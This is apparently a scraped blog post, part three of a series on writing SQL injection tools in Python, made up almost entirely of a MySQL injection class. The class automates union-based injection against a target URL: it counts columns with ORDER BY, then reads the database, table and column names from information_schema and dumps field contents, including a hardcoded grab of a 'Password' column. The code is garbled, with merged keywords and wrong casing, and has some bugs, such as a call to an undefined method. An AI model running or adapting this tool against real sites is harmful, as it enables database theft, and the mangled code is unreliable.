Python writing SQL injection tools (3)

MySQL Injection module

#coding:gb2312ImportUrllibImportstringImportBinasciiImportReclassmysqlinject ():def __init__(Self,url): Self.db='database ()'Self.url=url#URLs to be testedSelf.dblen=0#the length of the databaseSelf.counts=0#Number of fieldsSelf.tables=[]#TableSelf.dbname="'    #Detecting the version of a database    defjudgeversion (self): page=Urllib.urlopen (Self.url). read () SQL=string.join ([Self.url,"%20and%20mid (Version (), =523%)"],"') Pagex=Urllib.urlopen (Self.url). Read ()ifpage==Pagex:Print 'MySQL version: >5'        Else:            Print 'MySQL version <5'    #number of Detection fields    defcolumncounts (self): page=Urllib.urlopen (Self.url). Read () forNinchRange (1,100): SQL=string.join ([Self.url,"%20order%20by%20", str (n)],"') Pagex=urllib.urlopen (SQL). Read ()ifN==1:                ifpage==Pagex:Print 'You can use order by to guess'                Else:                    Print 'cannot use order by to guess'                     Break            Else:                ifpage!=pagex:self.counts=n-1Print 'number of fields:', Self.counts Break        ifself.counts==0:Print 'failed to guess the number of fields to solve!'    #the current database name is burst and the database user    definject5content (self,sql): URL=self.url+'%20and%201=2%20union%20select%20'         forXinchRange (1,self.counts+1):            ifX!=1: URL+=','URL+='concat (0x25,'URL+=SQL URL+=', 0x25)'Pagec=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (PAGEC)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1]            returnStringsdefInject5tablenames (self,db): URL=self.url+'%20and%201=2%20union%20select%20'         forXinchRange (1,self.counts+1):            ifX!=1: URL+=','URL+='concat (0x25,'URL+='Group_concat (distinct+table_name)'URL+=', 0x25)'URL+='%20from%20information_schema.columns%20where%20table_schema='URL+=DB Pagec=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \,,\-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (PAGEC)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1] s=strings.split (',')            returns#To guess the field name    defInject5columnsname (SELF,TB): URL=self.url+'%20and%201=2%20union%20select%20'         forXinchRange (1,self.counts+1):            ifX!=1: URL+=','URL+='concat (0x25,'URL+='Group_concat (distinct+column_name)'URL+=', 0x25)'URL+='%20from%20information_schema.columns%20where%20table_name='URL+=TB Pagec=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \,,\-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (PAGEC)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1] s=strings.split (',')            returns#Guess Field Contents    definject5countcontent (SELF,TN,CN): URL=self.url+'%20and%201=2%20union%20select%20'         forXinchRange (1,self.counts+1):            ifX!=1: URL+=','URL+='concat (0x25,'URL+=CN URL+=', 0x25)'URL+='%20from%20'URL+=TN Pagex=urllib.urlopen (URL). Read () Reg="%[a-z,0-9,a-z,., \,,\-,\\,@,:]*%"Regob=Re.compile (Reg, re. Dotall) Result=Regob.findall (Pagex)ifLen (result)! =0:strings=result[1] Strings=strings[1:len (strings)-1]            PrintCN,':', Strings#If the database version is greater than 4, you can use the ' check ' table method to inject    defInject5 (self): D='database ()'Self.database=Self.inject5content (d)Printself.database database0x=Binascii.b2a_hex (self.database) database0x='0x'+database0xPrintdatabase0x self.inject5tablename (database0x) self.inject5tablenames (database0x) TB=Self.tables[0]Print "'TB=Binascii.b2a_hex (TB) TB='0x'+TBPrintTB Self.inject5columnsname (TB) self.inject5countcontent ('gly','Password')

Python writing SQL injection tools (3)